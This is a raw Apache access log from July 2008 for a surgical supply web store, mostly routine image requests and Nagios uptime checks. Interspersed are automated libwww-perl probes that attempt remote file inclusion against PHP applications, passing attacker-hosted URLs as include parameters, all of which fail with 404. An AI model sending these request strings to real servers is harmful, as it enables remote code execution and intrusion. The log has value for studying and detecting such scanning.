118.166.232.67 - - [20/Jul/2008:00:42:36 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:37 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:43 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:44 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:46 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:48 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:49 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
87.106.65.144 - - [20/Jul/2008:00:42:49 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:42:50 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:42:50 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
118.166.232.67 - - [20/Jul/2008:00:42:51 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:53 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:55 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:56 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:58 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:00 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:02 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:03 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:06 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 200 1917 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:07 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:09 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:12 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:14 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:14 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:16 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:16 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:17 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:17 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:43:19 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
87.106.65.144 - - [20/Jul/2008:00:43:20 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:43:20 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:43:21 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
118.166.232.67 - - [20/Jul/2008:00:43:22 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [20/Jul/2008:00:44:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.166.232.67 - - [20/Jul/2008:00:45:02 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS%20(S0040):01 HTTP/1.1" 200 70652 "http://www.acesurgical.com/nuoss_particulates.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:45:14 -0400] "GET /images/items/5099001_THUMB.JPG HTTP/1.1" 200 2313 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:46:07 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):11+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:46:10 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:46:11 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:46:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:46:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
70.85.102.100 - - [20/Jul/2008:00:47:31 -0400] "GET //admin/templates/template_thumbnail.php?thumb_template=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
194.79.75.195 - - [20/Jul/2008:00:49:10 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/willysahputra/test.txt??? HTTP/1.1" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
209.59.12.99 - - [20/Jul/2008:00:49:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.166.232.67 - - [20/Jul/2008:00:52:57 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:53:03 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:53:07 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:53:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:53:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:53:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [20/Jul/2008:00:54:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.29.87.80 - - [20/Jul/2008:00:55:19 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
72.29.87.80 - - [20/Jul/2008:00:55:19 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
87.106.98.71 - - [20/Jul/2008:00:57:22 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.106.98.71 - - [20/Jul/2008:00:57:22 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.101.24 - - [20/Jul/2008:00:57:54 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.106.101.24 - - [20/Jul/2008:00:57:54 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.65.144 - - [20/Jul/2008:00:59:12 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:59:13 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:59:13 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:59:16 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:59:16 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
87.106.65.144 - - [20/Jul/2008:00:59:16 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jul/2008:00:59:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:04:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:18:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:23:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:28:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:33:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.193.201.57 - - [20/Jul/2008:01:34:17 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.75"
216.193.201.57 - - [20/Jul/2008:01:34:18 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.75"
74.6.22.179 - - [20/Jul/2008:01:48:28 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.179 - - [20/Jul/2008:01:48:28 -0400] "GET /logs/error_log.Q108041300 HTTP/1.0" 200 91860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [20/Jul/2008:01:50:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:01:55:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:00:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:05:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.246.124.139 - - [20/Jul/2008:02:09:10 -0400] "GET /logs/index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.812"
216.246.124.139 - - [20/Jul/2008:02:09:10 -0400] "GET /index2.php?x=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.812"
85.17.200.140 - - [20/Jul/2008:02:09:47 -0400] "GET /logs/error_log.Q108031900/config.php?path_to_root=http://gaara.007gb.com/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
85.17.200.140 - - [20/Jul/2008:02:09:47 -0400] "GET /config.php?path_to_root=http://gaara.007gb.com/id.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
85.17.200.140 - - [20/Jul/2008:02:09:47 -0400] "GET /logs/config.php?path_to_root=http://gaara.007gb.com/id.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
209.59.12.99 - - [20/Jul/2008:02:10:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.218.32 - - [20/Jul/2008:02:13:36 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=5442(ntermadmin)%20gid=5443(nterm)%20groups=5443(nterm)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2008:02:15:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:20:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.73.149 - - [20/Jul/2008:02:22:09 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
85.214.73.149 - - [20/Jul/2008:02:22:09 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
85.214.73.149 - - [20/Jul/2008:02:22:09 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 238 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jul/2008:02:25:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:30:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:35:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:40:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.199.218.32 - - [20/Jul/2008:02:41:03 -0400] "GET /logs/error_log.Q108040800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=5442(ntermadmin)%20gid=5443(nterm)%20groups=5443(nterm)%0A? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
217.199.218.32 - - [20/Jul/2008:02:41:03 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=5442(ntermadmin)%20gid=5443(nterm)%20groups=5443(nterm)%0A? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.199.218.32 - - [20/Jul/2008:02:41:03 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=uid=5442(ntermadmin)%20gid=5443(nterm)%20groups=5443(nterm)%0A? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2008:02:45:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:02:50:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.73.202.136 - - [20/Jul/2008:02:53:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21"
